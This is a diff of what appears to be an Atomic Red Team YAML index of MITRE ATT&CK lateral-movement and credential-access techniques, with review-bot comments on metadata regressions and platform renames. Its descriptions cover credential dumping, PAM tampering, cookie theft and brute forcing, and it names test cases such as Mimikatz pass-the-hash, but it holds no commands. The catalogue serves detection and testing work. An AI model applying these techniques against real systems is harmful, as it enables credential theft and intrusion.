description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -86143,7 +86819,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -86191,7 +86867,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -86224,7 +86900,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests:
- name: Radmin Viewer Utility
@@ -86368,7 +87043,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -86402,12 +87077,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
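Review bot: T1210 shows the same regression as T1563.001: in the preceding hunk `modified` goes back from 2022-05-11 to 2022-02-24, and here `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are dropped with no 3.2.0 replacement. Two techniques regressing in the same way points at a code path in the generator rather than bad upstream data; find what distinguishes these objects from the ones that were bumped correctly and fix that before merging, rather than hand-patching the YAML.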
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -86435,10 +87108,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -86468,7 +87140,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -86530,7 +87201,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests:
- name: Exfiltration Over SMB over QUIC (New-SmbMapping)
@@ -86585,7 +87255,7 @@ lateral-movement:
elevation_required: true
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -86609,11 +87279,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -86638,9 +87307,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -86700,7 +87368,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests:
- name: RDP hijacking
@@ -86781,7 +87448,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
@@ -86969,7 +87635,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests:
- name: RDP to DomainController
@@ -87099,7 +87764,7 @@ lateral-movement:
name: command_prompt
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -87156,6 +87821,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -87166,13 +87832,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -87231,7 +87896,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -87325,49 +87989,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
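Review bot: the description lines at the end of this hunk break mid-sentence around `pam_unix.so`, `/etc/passwd` and `/etc/shadow`, and the detection text below does the same around `/etc/pam.d/`; that is what you get when inline code markup is stripped from the upstream description and the surrounding line breaks are kept. It is unchanged context, so pre-existing, but since the generator output is being refreshed here, strip the markup without injecting newlines so the block scalar keeps each sentence on one line.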
@@ -87382,20 +88007,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
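Review bot: `x_mitre_permissions_required: [root]` is dropped from T1556.003 with no replacement field; if that property has been retired upstream, removing it is right, but anything that reads it to decide whether the `Malicious PAM rule` atomic needs elevation now silently gets nothing, so check consumers. The rest of the hunk is a whole-object key reorder (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors` and the `external_references` list all move) that hides the two real additions, `x_mitre_deprecated: false` and `revoked: false`; keeping a canonical key order in the generator would make this a five-line diff.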
@@ -87597,7 +88259,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests:
- name: Input Capture
@@ -87882,7 +88543,7 @@ credential-access:
elevation_required: false
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -87911,6 +88572,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -87922,18 +88584,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
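Review bot: the platform rename in this hunk (`Azure AD`, `Office 365` and `Google Workspace` removed, `Office Suite` and `Identity Provider` added, `x_mitre_version` bumped from 1.5 to 1.6) changes the strings that any per-platform index or filter keys on, so the platform-specific index files must be regenerated from the new names or this technique silently disappears from them. The same rename is applied to T1539, T1110.002 and T1606.002 further down, so one regeneration pass covers all four; a grep for the three old platform strings across the index files is the cheap check that nothing still references them.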
@@ -87960,9 +88622,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests:
- name: Brute Force Credentials of single Active Directory domain users via SMB
@@ -88303,7 +88962,7 @@ credential-access:
elevation_required: false
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -88427,7 +89086,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests:
- name: Gsecdump
@@ -88605,7 +89263,7 @@ credential-access:
elevation_required: false
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -88620,10 +89278,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -88631,14 +89290,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -88681,9 +89340,6 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests:
- name: Steal Firefox Cookies (Windows)
@@ -88808,7 +89464,7 @@ credential-access:
elevation_required: false
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -88863,9 +89519,8 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
@@ -89071,7 +89726,7 @@ credential-access:
elevation_required: true
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -89122,9 +89777,8 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests:
- name: Azure - Search Azure AD User Attributes for Passwords
@@ -89198,7 +89852,7 @@ credential-access:
name: powershell
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -89232,8 +89886,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
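Review bot: the `External to DA, the OS X Way` reference swaps the old `http://www.slideshare.net/StephanBorosh/...` link for the `https://www.slideshare.net/slideshow/.../62021418` form and moves the retrieved date to September 12, 2024, which is the right way to record a re-resolved URL. The same source is cited from T1555.001, which receives the identical update later in this diff; a grep for the old `StephanBorosh` path would confirm no other copy of the stale link remains in the file.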
@@ -89250,11 +89904,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -89272,7 +89925,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
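Review bot: this hunk only bumps `x_mitre_attack_spec_version` from 2.1.0 to 3.2.0 for T1110.002, whereas the sibling techniques in this sync (T1110.001, T1539, T1606.002) also gain an `x_mitre_modified_by_ref` line; none appears for T1110.002 here or in its trailing hunk, where only `spec_version` is removed. Worth confirming the field is already present elsewhere in the object and was not lost in the sync.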
@@ -89289,10 +89942,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -89316,7 +89969,6 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests:
- name: Password Cracking with Hashcat
@@ -89366,41 +90018,8 @@ credential-access:
elevation_required: true
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
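Review bot: everything the `-` lines remove here (platforms, domains, marking refs, type, id, created, version, the full `external_references` list, the deprecated and revoked flags) is re-added with the same values lower in the next hunk, so this is a pure key reorder plus the new `modified` date and the 2.1.0 to 3.2.0 spec bump. Reorders like this hide the one substantive change (the slideshare URL and its retrieved date) inside sixty lines of churn; if the generator can emit keys in a fixed canonical order, future syncs would produce a handful of lines for this object instead.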
@@ -89421,25 +90040,57 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests:
- name: Keychain Dump
@@ -89495,42 +90146,7 @@ credential-access:
elevation_required: false
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
